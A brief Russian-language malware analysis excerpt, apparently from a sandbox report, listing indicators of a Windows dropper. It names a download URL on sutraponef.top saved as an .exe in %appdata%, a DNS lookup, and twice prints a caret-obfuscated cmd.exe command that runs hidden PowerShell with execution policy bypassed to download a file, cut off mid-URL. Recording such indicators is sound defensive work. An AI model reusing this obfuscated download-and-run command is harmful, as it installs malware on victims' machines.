Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^E^rs^HelL.E^Xe -^exE^CutIO^npOl^I^Cy By^PAS^S ^-N^OProFil^E ^-WIn^do^Ws^t^yLe^ HI^D^deN (^nEW-O^bje^c^T ^sy^sTe^M^.net.W^E^B^C^LiE^n^t)^.DOwnl^oA^DfiLe(^'http://s...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "POW^E^rs^HelL.E^Xe -^exE^CutIO^npOl^I^Cy By^PAS^S ^-N^OProFil^E ^-WIn^do^Ws^t^yLe^ HI^D^deN (^nEW-O^bje^c^T ^sy^sTe^M^.net.W^E^B^C^LiE^n^t)^.DOwnl^oA^DfiLe(^'http://s...' (со скрытым окном)